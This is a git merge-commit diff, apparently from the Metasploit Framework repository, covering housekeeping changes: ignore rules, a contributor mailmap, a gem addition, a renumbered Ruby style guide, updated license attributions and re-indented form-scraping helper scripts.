Merge remote-tracking branch 'upstream/master' into getaddrinfo
commit
23ac7ad75a
|
@ -41,3 +41,13 @@ tags
|
|||
*~
|
||||
# Ignore backups of retabbed files
|
||||
*.notab
|
||||
|
||||
# ignore Visual Studio external source garbage
|
||||
*.suo
|
||||
*.sdf
|
||||
*.opensdf
|
||||
*.user
|
||||
|
||||
# ignore release/debug folders for exploits
|
||||
external/source/exploits/**/Debug
|
||||
external/source/exploits/**/Release
|
||||
|
|
39
.mailmap
39
.mailmap
|
@ -1,50 +1,54 @@
|
|||
bperry-r7 <bperry-r7@github> Brandon Perry <bperry.volatile@gmail.com>
|
||||
bperry-r7 <bperry-r7@github> Brandon Perry <bperry@bperry-rapid7.(none)>
|
||||
bturner-r7 <bturner-r7@github> Brandon Turner <brandon_turner@rapid7.com>
|
||||
dmaloney-r7 <dmaloney-r7@github> David Maloney <DMaloney@rapid7.com> # aka TheLightCosine
|
||||
dmaloney-r7 <dmaloney-r7@github> David Maloney <David_Maloney@rapid7.com>
|
||||
dmaloney-r7 <dmaloney-r7@github> David Maloney <DMaloney@rapid7.com> # aka TheLightCosine
|
||||
ecarey-r7 <ecarey-r7@github> Erran Carey <e@ipwnstuff.com>
|
||||
hmoore-r7 <hmoore-r7@github> HD Moore <hd_moore@rapid7.com>
|
||||
hmoore-r7 <hmoore-r7@github> HD Moore <hdm@digitaloffense.net>
|
||||
jlee-r7 <jlee-r7@github> James Lee <James_Lee@rapid7.com>
|
||||
jlee-r7 <jlee-r7@github> James Lee <egypt@metasploit.com> # aka egypt
|
||||
jlee-r7 <jlee-r7@github> egypt <egypt@metasploit.com> # aka egypt
|
||||
jlee-r7 <jlee-r7@github> James Lee <egypt@metasploit.com> # aka egypt
|
||||
jlee-r7 <jlee-r7@github> James Lee <James_Lee@rapid7.com>
|
||||
joev-r7 <joev-r7@github> joev <joev@metasploit.com>
|
||||
joev-r7 <joev-r7@github> Joe Vennix <Joe_Vennix@rapid7.com>
|
||||
jvazquez-r7 <jvazquez-r7@github> jvazquez-r7 <juan.vazquez@metasploit.com>
|
||||
jvazquez-r7 <jvazquez-r7@github> jvazquez-r7 <juan_vazquez@rapid7.com>
|
||||
limhoff-r7 <limhoff-r7@github> Luke Imhoff <luke_imhoff@rapid7.com>
|
||||
shuckins-r7 <shuckins-r7@github> Samuel Huckins <samuel_huckins@rapid7.com>
|
||||
tasos-r7 <tasos-r7@github> Tasos Laskos <Tasos_Laskos@rapid7.com>
|
||||
todb-r7 <todb-r7@github> Tod Beardsley <tod_beardsley@rapid7.com>
|
||||
todb-r7 <todb-r7@github> Tod Beardsley <todb@metasploit.com>
|
||||
wchen-r7 <wchen-r7@github> Wei Chen <Wei_Chen@rapid7.com>
|
||||
wchen-r7 <wchen-r7@github> sinn3r <msfsinn3r@gmail.com> # aka sinn3r
|
||||
wchen-r7 <wchen-r7@github> sinn3r <wei_chen@rapid7.com>
|
||||
wchen-r7 <wchen-r7@github> Wei Chen <Wei_Chen@rapid7.com>
|
||||
wvu-r7 <wvu-r7@github> William Vu <William_Vu@rapid7.com>
|
||||
wvu-r7 <wvu-r7@github> William Vu <wvu@nmt.edu>
|
||||
|
||||
# Above this line are current Rapid7 employees Below this paragraph are
|
||||
# Above this line are current Rapid7 employees. Below this paragraph are
|
||||
# volunteers, former employees, and potential Rapid7 employees who, at
|
||||
# one time or another, had some largeish number of commits landed on
|
||||
# rapid7/metasploit-framework master branch. This should be refreshed
|
||||
# periodically. If you're on this list and would like to not be, just
|
||||
# let todb@metasploit.com know.
|
||||
|
||||
bannedit <bannedit@github> David Rude <bannedit0@gmail.com>
|
||||
Brandon Perry <brandonprry@github> Brandon Perry <bperry.volatile@gmail.com>
|
||||
Brandon Perry <brandonprry@github> Brandon Perry <bperry@bperry-rapid7.(none)>
|
||||
Brian Wallace <bwall@github> (B)rian (Wall)ace <nightstrike9809@gmail.com>
|
||||
Brian Wallace <bwall@github> Brian Wallace <bwall@openbwall.com>
|
||||
ceballosm <ceballosm@github> Mario Ceballos <mc@metasploit.com>
|
||||
Chao-mu <Chao-Mu@github> Chao Mu <chao.mu@minorcrash.com>
|
||||
Chao-mu <Chao-Mu@github> chao-mu <chao.mu@minorcrash.com>
|
||||
Chao-mu <Chao-Mu@github> chao-mu <chao@confusion.(none)>
|
||||
ChrisJohnRiley <ChrisJohnRiley@github> Chris John Riley <chris.riley@c22.cc>
|
||||
ChrisJohnRiley <ChrisJohnRiley@github> Chris John Riley <reg@c22.cc>
|
||||
FireFart <FireFart@github> Christian Mehlmauer <firefart@gmail.com>
|
||||
Meatballs1 <Meatballs1@github> Ben Campbell <eat_meatballs@hotmail.co.uk>
|
||||
Meatballs1 <Meatballs1@github> Meatballs <eat_meatballs@hotmail.co.uk>
|
||||
Meatballs1 <Meatballs1@github> Meatballs1 <eat_meatballs@hotmail.co.uk>
|
||||
bannedit <bannedit@github> David Rude <bannedit0@gmail.com>
|
||||
ceballosm <ceballosm@github> Mario Ceballos <mc@metasploit.com>
|
||||
corelanc0d3er <corelanc0d3er@github> Peter Van Eeckhoutte (corelanc0d3r) <peter.ve@corelan.be>
|
||||
corelanc0d3er <corelanc0d3er@github> corelanc0d3r <peter.ve@corelan.be>
|
||||
corelanc0d3er <corelanc0d3er@github> Peter Van Eeckhoutte (corelanc0d3r) <peter.ve@corelan.be>
|
||||
darkoperator <darkoperator@github> Carlos Perez <carlos_perez@darkoperator.com>
|
||||
efraintorres <efraintorres@github> efraintorres <etlownoise@gmail.com>
|
||||
efraintorres <efraintorres@github> et <>
|
||||
fab <fab@???> fab <> # fab at revhosts.net (Fabrice MOURRON)
|
||||
h0ng10 <h0ng10@github> Hans-Martin Münch <hansmartin.muench@googlemail.com>
|
||||
FireFart <FireFart@github> Christian Mehlmauer <firefart@gmail.com>
|
||||
h0ng10 <h0ng10@github> h0ng10 <hansmartin.muench@googlemail.com>
|
||||
h0ng10 <h0ng10@github> Hans-Martin Münch <hansmartin.muench@googlemail.com>
|
||||
jcran <jcran@github> Jonathan Cran <jcran@0x0e.org>
|
||||
jcran <jcran@github> Jonathan Cran <jcran@rapid7.com>
|
||||
jduck <jduck@github> Joshua Drake <github.jdrake@qoop.org>
|
||||
|
@ -56,11 +60,16 @@ kris <kris@???> kris <>
|
|||
m-1-k-3 <m-1-k-3@github> m-1-k-3 <github@s3cur1ty.de>
|
||||
m-1-k-3 <m-1-k-3@github> m-1-k-3 <m1k3@s3cur1ty.de>
|
||||
m-1-k-3 <m-1-k-3@github> m-1-k-3 <michael.messner@integralis.com>
|
||||
Meatballs1 <Meatballs1@github> Ben Campbell <eat_meatballs@hotmail.co.uk>
|
||||
Meatballs1 <Meatballs1@github> Meatballs <eat_meatballs@hotmail.co.uk>
|
||||
Meatballs1 <Meatballs1@github> Meatballs1 <eat_meatballs@hotmail.co.uk>
|
||||
mubix <mubix@github> Rob Fuller <jd.mubix@gmail.com>
|
||||
nevdull77 <nevdull77@github> Patrik Karlsson <patrik@cqure.net>
|
||||
nmonkee <nmonkee@github> nmonkee <dave@northern-monkee.co.uk>
|
||||
nullbind <nullbind@github> nullbind <scott.sutherland@nullbind.com>
|
||||
ohdae <ohdae@github> ohdae <bindshell@live.com>
|
||||
OJ <oj@github> OJ Reeves <oj@buffered.io>
|
||||
OJ <oj@github> OJ <oj@buffered.io>
|
||||
r3dy <r3dy@github> Royce Davis <r3dy@Royces-MacBook-Pro.local>
|
||||
r3dy <r3dy@github> Royce Davis <royce.e.davis@gmail.com>
|
||||
rsmudge <rsmudge@github> Raphael Mudge <rsmudge@gmail.com> # Aka `butane
|
||||
|
|
2
Gemfile
2
Gemfile
|
@ -40,6 +40,8 @@ group :development, :test do
|
|||
# Version 4.1.0 or newer is needed to support generate calls without the
|
||||
# 'FactoryGirl.' in factory definitions syntax.
|
||||
gem 'factory_girl', '>= 4.1.0'
|
||||
# Make rspec output shorter and more useful
|
||||
gem 'fivemat', '1.2.1'
|
||||
# running documentation generation tasks and rspec tasks
|
||||
gem 'rake', '>= 10.0.0'
|
||||
end
|
||||
|
|
|
@ -18,6 +18,7 @@ GEM
|
|||
diff-lcs (1.2.4)
|
||||
factory_girl (4.2.0)
|
||||
activesupport (>= 3.0.0)
|
||||
fivemat (1.2.1)
|
||||
i18n (0.6.5)
|
||||
json (1.8.0)
|
||||
metasploit_data_models (0.16.6)
|
||||
|
@ -62,6 +63,7 @@ DEPENDENCIES
|
|||
activesupport (>= 3.0.0)
|
||||
database_cleaner
|
||||
factory_girl (>= 4.1.0)
|
||||
fivemat (= 1.2.1)
|
||||
json
|
||||
metasploit_data_models (~> 0.16.6)
|
||||
msgpack
|
||||
|
|
51
HACKING
51
HACKING
|
@ -36,13 +36,7 @@ lock up the entire module when called from other interfaces. If you
|
|||
need user input, you can either register an option or expose an
|
||||
interactive session type specific for the type of exploit.
|
||||
|
||||
3. Don't use "sleep". It has been known to cause issues with
|
||||
multi-threaded programs on various platforms running an older version of
|
||||
Ruby such as 1.8. Instead, we use "select(nil, nil, nil, <time>)" or
|
||||
Rex.sleep() throughout the framework. We have found this works around
|
||||
the underlying issue.
|
||||
|
||||
4. Always use Rex sockets, not ruby sockets. This includes
|
||||
3. Always use Rex sockets, not ruby sockets. This includes
|
||||
third-party libraries such as Net::Http. There are several very good
|
||||
reasons for this rule. First, the framework doesn't get notified on
|
||||
the creation of ruby sockets and won't know how to clean them up in
|
||||
|
@ -54,49 +48,46 @@ already implemented with Rex and if the protocol you need is missing,
|
|||
porting another library to use them is straight-forward. See our
|
||||
Net::SSH modifications in lib/net/ssh/ for an example.
|
||||
|
||||
5. When opening an IO stream, always force binary with "b" mode (or
|
||||
4. When opening an IO stream, always force binary with "b" mode (or
|
||||
using IO#binmode). This not only helps keep Windows and non-Windows
|
||||
runtime environments consistent with each other, but also guarantees
|
||||
that files will be treated as ASCII-8BIT instead of UTF-8.
|
||||
|
||||
6. Don't use String#[] for a single character. This returns a Fixnum in
|
||||
5. Don't use String#[] for a single character. This returns a Fixnum in
|
||||
ruby 1.8 and a String in 1.9, so it's safer to use the following idiom:
|
||||
str[idx,1]
|
||||
str[idx,1]
|
||||
which always returns a String. If you need the ASCII byte, unpack it like
|
||||
so:
|
||||
str[idx,1].unpack("C")[0]
|
||||
so:
|
||||
tr[idx,1].unpack("C")[0]
|
||||
|
||||
7. Whenever possible, avoid using '+' or '+=' to concatenate strings.
|
||||
6. Whenever possible, avoid using '+' or '+=' to concatenate strings.
|
||||
The '<<' operator is significantly faster. The difference will become
|
||||
even more apparent when doing string manipulation in a loop. The
|
||||
following table approximates the underlying implementation:
|
||||
Ruby Pseudo-C
|
||||
----------- ----------------
|
||||
a = b + c a = malloc(b.len+c.len+1);
|
||||
strcpy(a, b);
|
||||
memcpy(a+b.len, c, c.len);
|
||||
a[b.len + c.len] = '\0';
|
||||
a = b a = b;
|
||||
a << c a = realloc(a, a.len+c.len+1);
|
||||
memcpy(a+a.len, c, c.len);
|
||||
a[a.len + c.len] = '\0';
|
||||
|
||||
Ruby Pseudo-C
|
||||
----------- ----------------
|
||||
a = b + c a = malloc(b.len+c.len+1);
|
||||
strcpy(a, b);
|
||||
memcpy(a+b.len, c, c.len);
|
||||
a[b.len + c.len] = '\0';
|
||||
a = b a = b;
|
||||
a << c a = realloc(a, a.len+c.len+1);
|
||||
memcpy(a+a.len, c, c.len);
|
||||
a[a.len + c.len] = '\0';
|
||||
|
||||
Note that the original value of 'b' is lost in the second case. Care
|
||||
must be taken to duplicate strings that you do not want to modify.
|
||||
|
||||
8. For other Ruby 1.8.x/1.9.x compat issues, please see Sam Ruby's
|
||||
7. For other Ruby 1.8.x/1.9.x compat issues, please see Sam Ruby's
|
||||
excellent slide show at <http://slideshow.rubyforge.org/ruby19.html>
|
||||
for an overview of common and not-so-common Ruby version related gotchas.
|
||||
|
||||
9. Never, ever use $global variables. This applies to modules, mixins,
|
||||
8. Never, ever use $global variables. This applies to modules, mixins,
|
||||
and libraries. If you need a "global" within a specific class, you can
|
||||
use @@class_variables, but most modules should use @instance variables
|
||||
to store information between methods.
|
||||
|
||||
10. Do not define CONSTANTS within individual modules. This can lead to
|
||||
warning messages when the module is reloaded. Try to keep constants
|
||||
inside libraries and mixins instead.
|
||||
|
||||
|
||||
Creating New Modules
|
||||
====================
|
||||
|
||||
|
|
347
LICENSE
347
LICENSE
|
@ -12,7 +12,7 @@ License: BSD-3-clause
|
|||
#
|
||||
# This license does not apply to third-party components detailed below.
|
||||
#
|
||||
# Last updated: 2013-Mar-25
|
||||
# Last updated: 2013-Nov-04
|
||||
#
|
||||
|
||||
Files: data/john/*
|
||||
|
@ -166,230 +166,6 @@ Files: lib/fastlib.rb
|
|||
Copyright: 2011, Rapid7 Inc.
|
||||
License: Ruby
|
||||
|
||||
Files: lib/gemcache/ruby/1.9.1/arch/*/eventmachine-*/*
|
||||
Copyright: 2006-2007, Francis Cianfrocca
|
||||
License: Ruby
|
||||
|
||||
Files: lib/gemcache/ruby/1.9.1/arch/*/json-*/*
|
||||
Copyright: Daniel Luz <dev at mernen dot com>
|
||||
License: Ruby
|
||||
|
||||
Files: lib/gemcache/ruby/1.9.1/arch/*/msgpack-*/*
|
||||
Copyright: Austin Ziegler
|
||||
License: Ruby
|
||||
|
||||
Files: lib/gemcache/ruby/1.9.1/arch/*/nokogiri-*/*
|
||||
Copyright: 2008 - 2012 Aaron Patterson, Mike Dalessio, Charles Nutter, Sergio Arbeo, Patrick Mahoney, Yoko Harada
|
||||
License: MIT
|
||||
|
||||
Files: lib/gemcache/ruby/1.9.1/arch/*/pg-*/*
|
||||
Copyright: 1997-2012 by the authors
|
||||
License: Ruby
|
||||
|
||||
Files: lib/gemcache/ruby/1.9.1/arch/*/thin-*/*
|
||||
Copyright: Marc-Andre Cournoyer
|
||||
License: Ruby
|
||||
|
||||
Files: lib/gemcache/ruby/1.9.1/arch/*/win32-api-*/*
|
||||
Copyright: 2003-2011, Daniel J. Berger
|
||||
License: Artistic
|
||||
|
||||
Files: lib/gemcache/ruby/1.9.1/arch/*/win32-service-*/*
|
||||
Copyright: 2003-2011, Daniel J. Berger
|
||||
License: Artistic
|
||||
|
||||
Files: lib/gemcache/ruby/1.9.1/arch/*/windows-api-*/*
|
||||
Copyright: 2007-2012, Daniel J. Berger
|
||||
License: Artistic
|
||||
|
||||
Files: lib/gemcache/ruby/1.9.1/arch/*/windows-pr-*/*
|
||||
Copyright: 2006-2010, Daniel J. Berger
|
||||
License: Artistic
|
||||
|
||||
Files: lib/gemcache/ruby/1.9.1/gems/coderay-*/*
|
||||
Copyright: 2006-2011, murphy (Kornelius Kalnback) <murphy rubychan de>
|
||||
License: LGPL-2.1
|
||||
|
||||
Files: lib/gemcache/ruby/1.9.1/gems/actionmailer-*/*
|
||||
Copyright: 2004-2011 David Heinemeier Hansson
|
||||
License: MIT
|
||||
|
||||
Files: lib/gemcache/ruby/1.9.1/gems/actionpack-*/*
|
||||
Copyright: 2004-2011 David Heinemeier Hansson
|
||||
License: MIT
|
||||
|
||||
Files: lib/gemcache/ruby/1.9.1/gems/activemodel-*/*
|
||||
Copyright: 2004-2011 David Heinemeier Hansson
|
||||
License: MIT
|
||||
|
||||
Files: lib/gemcache/ruby/1.9.1/gems/activerecord-*/*
|
||||
Copyright: 2004-2011 David Heinemeier Hansson
|
||||
License: MIT
|
||||
|
||||
Files: lib/gemcache/ruby/1.9.1/gems/activeresource-*/*
|
||||
Copyright: 2006-2011 David Heinemeier Hansson
|
||||
License: MIT
|
||||
|
||||
Files: lib/gemcache/ruby/1.9.1/gems/activesupport-*/*
|
||||
Copyright: 2005-2011 David Heinemeier Hansson
|
||||
License: MIT
|
||||
|
||||
Files: lib/gemcache/ruby/1.9.1/gems/acts_as_list-*/*
|
||||
Copyright: 2007 David Heinemeir Hansson
|
||||
License: MIT
|
||||
|
||||
Files: lib/gemcache/ruby/1.9.1/gems/arel-*/*
|
||||
Copyright: 2007-2010 Nick Kallen, Bryan Helmkamp, Emilio Tagua, Aaron Patterson
|
||||
License: MIT
|
||||
|
||||
Files: lib/gemcache/ruby/1.9.1/gems/authlogic-*/*
|
||||
Copyright: 2011 Ben Johnson of Binary Logic
|
||||
License: MIT
|
||||
|
||||
Files: lib/gemcache/ruby/1.9.1/gems/builder-*/*
|
||||
Copyright: 2003-2012 Jim Weirich (jim.weirich@gmail.com)
|
||||
License: MIT
|
||||
|
||||
Files: lib/gemcache/ruby/1.9.1/gems/carrierwave-*/*
|
||||
Copyright: 2008-2012 Jonas Nicklas
|
||||
License: MIT
|
||||
|
||||
Files: lib/gemcache/ruby/1.9.1/gems/chunky_png-*/*
|
||||
Copyright: 2010 Willem van Bergen
|
||||
License: MIT
|
||||
|
||||
Files: lib/gemcache/ruby/1.9.1/gems/coderay-*/*
|
||||
Copyright: Rob Aldred
|
||||
License: MIT
|
||||
|
||||
Files: lib/gemcache/ruby/1.9.1/gems/daemons-*/*
|
||||
Copyright: 2005-2012 Thomas Uehlinger
|
||||
License: MIT
|
||||
|
||||
Files: lib/gemcache/ruby/1.9.1/gems/diff-lcs-*/*
|
||||
Copyright: 2004-2011 Austin Ziegler
|
||||
License: MIT
|
||||
|
||||
Files: lib/gemcache/ruby/1.9.1/gems/erubis-*/*
|
||||
Copyright: 2006-2011 kuwata-lab.com all rights reserved
|
||||
License: MIT
|
||||
|
||||
Files: lib/gemcache/ruby/1.9.1/gems/formtastic-*/*
|
||||
Copyright: 2008-2010
|
||||
License: MIT
|
||||
|
||||
Files: lib/gemcache/ruby/1.9.1/gems/fssm-*/*
|
||||
Copyright: 2011 Travis Tilley
|
||||
License: MIT
|
||||
|
||||
Files: lib/gemcache/ruby/1.9.1/gems/hike-*/*
|
||||
Copyright: 2011 Sam Stephenson
|
||||
License: MIT
|
||||
|
||||
Files: lib/gemcache/ruby/1.9.1/gems/i18n-*/*
|
||||
Copyright: 2008 The Ruby I18n team
|
||||
License: MIT
|
||||
|
||||
Files: lib/gemcache/ruby/1.9.1/gems/ice_cube-*/*
|
||||
Copyright: 2010-2012 John Crepezzi
|
||||
License: MIT
|
||||
|
||||
Files: lib/gemcache/ruby/1.9.1/gems/journey-*/*
|
||||
Copyright: 2011 Aaron Patternson
|
||||
License: MIT
|
||||
|
||||
Files: lib/gemcache/ruby/1.9.1/gems/jquery-rails-*/*
|
||||
Copyright: 2010 Andre Arko
|
||||
License: MIT
|
||||
|
||||
Files: lib/gemcache/ruby/1.9.1/gems/liquid-*/*
|
||||
Copyright: 2005, 2006 Tobias Luetke
|
||||
License: MIT
|
||||
|
||||
Files: lib/gemcache/ruby/1.9.1/gems/mail-*/*
|
||||
Copyright: 2009, 2010, 2011, 2012 Mikel Lindsaar
|
||||
License: MIT
|
||||
|
||||
Files: lib/gemcache/ruby/1.9.1/gems/metasploit_data_modules-*/*
|
||||
Copyright: 2012 Rapid7, Inc.
|
||||
License: MIT
|
||||
|
||||
Files: lib/gemcache/ruby/1.9.1/gems/method_source-*/*
|
||||
Copyright: 2011 John Mair (banisterfiend)
|
||||
License: MIT
|
||||
|
||||
Files: lib/gemcache/ruby/1.9.1/gems/multi_json-*/*
|
||||
Copyright: 2010 Michael Bleigh, Josh Kalderimis, Erik Michaels-Ober, and Intridea, Inc.
|
||||
License: MIT
|
||||
|
||||
Files: lib/gemcache/ruby/1.9.1/gems/polyglot-*/*
|
||||
Copyright: 2007 Clifford Heath
|
||||
License: MIT
|
||||
|
||||
Files: lib/gemcache/ruby/1.9.1/gems/prototype_legacy_helper-*/*
|
||||
Copyright: No copyright statement provided (unmaintained per https://github.com/rails/prototype_legacy_helper)
|
||||
License: MIT
|
||||
|
||||
Files: lib/gemcache/ruby/1.9.1/gems/rack-*/*
|
||||
Copyright: 2007-2010 Christian Neukirchen <purl.org/net/chneukirchen>
|
||||
License: MIT
|
||||
|
||||
Files: lib/gemcache/ruby/1.9.1/gems/rack-cache-*/*
|
||||
Copyright: 2008 Ryan Tomayko <http://tomayko.com/about>
|
||||
License: MIT
|
||||
|
||||
Files: lib/gemcache/ruby/1.9.1/gems/rack-ssl-*/*
|
||||
Copyright: 2010 Joshua Peek
|
||||
License: MIT
|
||||
|
||||
Files: lib/gemcache/ruby/1.9.1/gems/rack-test-*/*
|
||||
Copyright: 2008-2009 Bryan Helmkamp, Engine Yard Inc.
|
||||
License: MIT
|
||||
|
||||
Files: lib/gemcache/ruby/1.9.1/gems/railties-*/*
|
||||
Copyright: No copyright statement provided
|
||||
License: MIT
|
||||
|
||||
Files: lib/gemcache/ruby/1.9.1/gems/rake-*/*
|
||||
Copyright: 2003, 2004 Jim Weirich
|
||||
License: MIT
|
||||
|
||||
Files: lib/gemcache/ruby/1.9.1/gems/robots-*/*
|
||||
Copyright: 2008 Kyle Maxwell, contributors
|
||||
License: MIT
|
||||
|
||||
Files: lib/gemcache/ruby/1.9.1/gems/slop-*/*
|
||||
Copyright: 2012 Lee Jarvis
|
||||
License: MIT
|
||||
|
||||
Files: lib/gemcache/ruby/1.9.1/gems/spork-*/*
|
||||
Copyright: 2009 Tim Harper
|
||||
License: MIT
|
||||
|
||||
Files: lib/gemcache/ruby/1.9.1/gems/sprockets-*/*
|
||||
Copyright: 2011 Sam Stephenson, Joshua Peek
|
||||
License: MIT
|
||||
|
||||
Files: lib/gemcache/ruby/1.9.1/gems/state_machine-*/*
|
||||
Copyright: 2006-2012 Aaron Pfeifer
|
||||
License: MIT
|
||||
|
||||
Files: lib/gemcache/ruby/1.9.1/gems/thor-*/*
|
||||
Copyright: 2008 Yehuda Katz
|
||||
License: MIT
|
||||
|
||||
Files: lib/gemcache/ruby/1.9.1/gems/tilt-*/*
|
||||
Copyright: 2010 Ryan Tomayko <http://tomayko.com/about>
|
||||
License: MIT
|
||||
|
||||
Files: lib/gemcache/ruby/1.9.1/gems/treetop-*/*
|
||||
Copyright: 2007 Nathan Sobo
|
||||
License: MIT
|
||||
|
||||
Files: lib/gemcache/ruby/1.9.1/gems/tzinfo-*/*
|
||||
Copyright: 2005-2006 Philip Ross
|
||||
License: MIT
|
||||
|
||||
Files: lib/metasm.rb lib/metasm/* data/cpuinfo/*
|
||||
Copyright: 2006-2010 Yoann GUILLOT
|
||||
License: LGPL-2.1
|
||||
|
@ -454,6 +230,127 @@ Files: modules/payloads/singles/windows/speak_pwned.rb
|
|||
Copyright: 2009-2010 Berend-Jan "SkyLined" Wever <berendjanwever@gmail.com>
|
||||
License: BSD-3-clause
|
||||
|
||||
#
|
||||
# Gems
|
||||
#
|
||||
|
||||
Files: activemodel
|
||||
Copyright: 2004-2011 David Heinemeier Hansson
|
||||
License: MIT
|
||||
|
||||
Files: activerecord
|
||||
Copyright: 2004-2011 David Heinemeier Hansson
|
||||
License: MIT
|
||||
|
||||
Files: activesupport
|
||||
Copyright: 2005-2011 David Heinemeier Hansson
|
||||
License: MIT
|
||||
|
||||
Files: arel
|
||||
Copyright: 2007-2010 Nick Kallen, Bryan Helmkamp, Emilio Tagua, Aaron Patterson
|
||||
License: MIT
|
||||
|
||||
Files: builder
|
||||
Copyright: 2003-2012 Jim Weirich (jim.weirich@gmail.com)
|
||||
License: MIT
|
||||
|
||||
Files: database_cleaner
|
||||
Copyright: 2009 Ben Mabey
|
||||
License: MIT
|
||||
|
||||
Files: diff-lcs
|
||||
Copyright: 2004-2011 Austin Ziegler
|
||||
License: MIT
|
||||
|
||||
Files: factory_girl
|
||||
Copyright: 2008-2013 Joe Ferris and thoughtbot, inc.
|
||||
License: MIT
|
||||
|
||||
Files: fivemat
|
||||
Copyright: 2012 Tim Pope
|
||||
License: MIT
|
||||
|
||||
Files: i18n
|
||||
Copyright: 2008 The Ruby I18n team
|
||||
License: MIT
|
||||
|
||||
Files: json
|
||||
Copyright: Daniel Luz <dev at mernen dot com>
|
||||
License: Ruby
|
||||
|
||||
Files: metasploit_data_models
|
||||
Copyright: 2012 Rapid7, Inc.
|
||||
License: MIT
|
||||
|
||||
Files: mini_portile
|
||||
Copyright: 2011 Luis Lavena
|
||||
License: MIT
|
||||
|
||||
Files: msgpack
|
||||
Copyright: Austin Ziegler
|
||||
License: Ruby
|
||||
|
||||
Files: multi_json
|
||||
Copyright: 2010 Michael Bleigh, Josh Kalderimis, Erik Michaels-Ober, and Intridea, Inc.
|
||||
License: MIT
|
||||
|
||||
Files: network_interface
|
||||
Copyright: 2012, Rapid7, Inc.
|
||||
License: MIT
|
||||
|
||||
Files: nokogiri
|
||||
Copyright: 2008 - 2012 Aaron Patterson, Mike Dalessio, Charles Nutter, Sergio Arbeo, Patrick Mahoney, Yoko Harada
|
||||
License: MIT
|
||||
|
||||
Files: packetfu
|
||||
Copyright: 2008-2012 Tod Beardsley
|
||||
License: BSD-3-clause
|
||||
|
||||
Files: pcaprub
|
||||
Copyright: 2007-2008, Alastair Houghton
|
||||
License: LGPL-2.1
|
||||
|
||||
Files: pg
|
||||
Copyright: 1997-2012 by the authors
|
||||
License: Ruby
|
||||
|
||||
Files: rake
|
||||
Copyright: 2003, 2004 Jim Weirich
|
||||
License: MIT
|
||||
|
||||
Files: redcarpet
|
||||
Copyright: 2009 Natacha Porté
|
||||
License: MIT
|
||||
|
||||
Files: robots
|
||||
Copyright: 2008 Kyle Maxwell, contributors
|
||||
License: MIT
|
||||
|
||||
Files: rspec
|
||||
Copyright: 2009 Chad Humphries, David Chelimsky
|
||||
License: MIT
|
||||
|
||||
Files: shoulda-matchers
|
||||
Copyright: 2006-2013, Tammer Saleh, thoughtbot, inc.
|
||||
License: MIT
|
||||
|
||||
Files: simplecov
|
||||
Copyright: 2010-2012 Christoph Olszowka
|
||||
License: MIT
|
||||
|
||||
Files: timecop
|
||||
Copyright: 2012 Travis Jeffery, John Trupiano
|
||||
License: MIT
|
||||
|
||||
Files: tzinfo
|
||||
Copyright: 2005-2006 Philip Ross
|
||||
License: MIT
|
||||
|
||||
Files: yard
|
||||
Copyright: 2007-2013 Loren Segal
|
||||
License: MIT
|
||||
|
||||
|
||||
License: BSD-2-clause
|
||||
Redistribution and use in source and binary forms, with or without modification,
|
||||
are permitted provided that the following conditions are met:
|
||||
|
|
Binary file not shown.
|
@ -15,8 +15,8 @@ require 'open-uri'
|
|||
require 'timeout'
|
||||
|
||||
def usage
|
||||
$stderr.puts "#{$0} [site list] [output-dir]"
|
||||
exit(0)
|
||||
$stderr.puts "#{$0} [site list] [output-dir]"
|
||||
exit(0)
|
||||
end
|
||||
|
||||
input = ARGV.shift() || usage()
|
||||
|
@ -25,32 +25,32 @@ res = ""
|
|||
doc = Hpricot(File.open(input))
|
||||
doc.search("//form").each do |form|
|
||||
|
||||
# Extract the form
|
||||
res = "<form"
|
||||
form.attributes.each do |attr|
|
||||
res << " #{attr[0]}='#{attr[1].gsub("'", "")}'"
|
||||
end
|
||||
res << "> "
|
||||
# Extract the form
|
||||
res = "<form"
|
||||
form.attributes.each do |attr|
|
||||
res << " #{attr[0]}='#{attr[1].gsub("'", "")}'"
|
||||
end
|
||||
res << "> "
|
||||
|
||||
# Strip out the value
|
||||
form.search("//input") do |inp|
|
||||
# Strip out the value
|
||||
form.search("//input") do |inp|
|
||||
|
||||
inp.attributes.keys.each do |ikey|
|
||||
if (ikey.downcase == "value")
|
||||
inp[ikey] = ""
|
||||
next
|
||||
end
|
||||
inp.attributes.keys.each do |ikey|
|
||||
if (ikey.downcase == "value")
|
||||
inp[ikey] = ""
|
||||
next
|
||||
end
|
||||
|
||||
if(inp.attributes[ikey] =~ /^http/i)
|
||||
inp[ikey] = ""
|
||||
next
|
||||
end
|
||||
if(inp.attributes[ikey] =~ /^http/i)
|
||||
inp[ikey] = ""
|
||||
next
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
|
||||
res << inp.to_html
|
||||
end
|
||||
res << "</form>"
|
||||
res << inp.to_html
|
||||
end
|
||||
res << "</form>"
|
||||
end
|
||||
|
||||
$stdout.puts res
|
||||
|
|
|
@ -15,72 +15,72 @@ require 'open-uri'
|
|||
require 'timeout'
|
||||
|
||||
def usage
|
||||
$stderr.puts "#{$0} [site list] [output-dir]"
|
||||
exit(0)
|
||||
$stderr.puts "#{$0} [site list] [output-dir]"
|
||||
exit(0)
|
||||
end
|
||||
|
||||
sitelist = ARGV.shift() || usage()
|
||||
output = ARGV.shift() || usage()
|
||||
|
||||
File.readlines(sitelist).each do |site|
|
||||
site.strip!
|
||||
next if site.length == 0
|
||||
next if site =~ /^#/
|
||||
|
||||
out = File.join(output, site + ".txt")
|
||||
File.unlink(out) if File.exists?(out)
|
||||
|
||||
fd = File.open(out, "a")
|
||||
|
||||
site.strip!
|
||||
next if site.length == 0
|
||||
next if site =~ /^#/
|
||||
|
||||
out = File.join(output, site + ".txt")
|
||||
File.unlink(out) if File.exists?(out)
|
||||
|
||||
fd = File.open(out, "a")
|
||||
|
||||
|
||||
["", "www."].each do |prefix|
|
||||
begin
|
||||
Timeout.timeout(10) do
|
||||
doc = Hpricot(open("http://#{prefix}#{site}/"))
|
||||
doc.search("//form").each do |form|
|
||||
["", "www."].each do |prefix|
|
||||
begin
|
||||
Timeout.timeout(10) do
|
||||
doc = Hpricot(open("http://#{prefix}#{site}/"))
|
||||
doc.search("//form").each do |form|
|
||||
|
||||
# Extract the form
|
||||
res = "<form"
|
||||
form.attributes.each do |attr|
|
||||
res << " #{attr[0]}='#{attr[1].gsub("'", "")}'"
|
||||
end
|
||||
res << "> "
|
||||
# Extract the form
|
||||
res = "<form"
|
||||
form.attributes.each do |attr|
|
||||
res << " #{attr[0]}='#{attr[1].gsub("'", "")}'"
|
||||
end
|
||||
res << "> "
|
||||
|
||||
# Strip out the value
|
||||
form.search("//input") do |inp|
|
||||
# Strip out the value
|
||||
form.search("//input") do |inp|
|
||||
|
||||
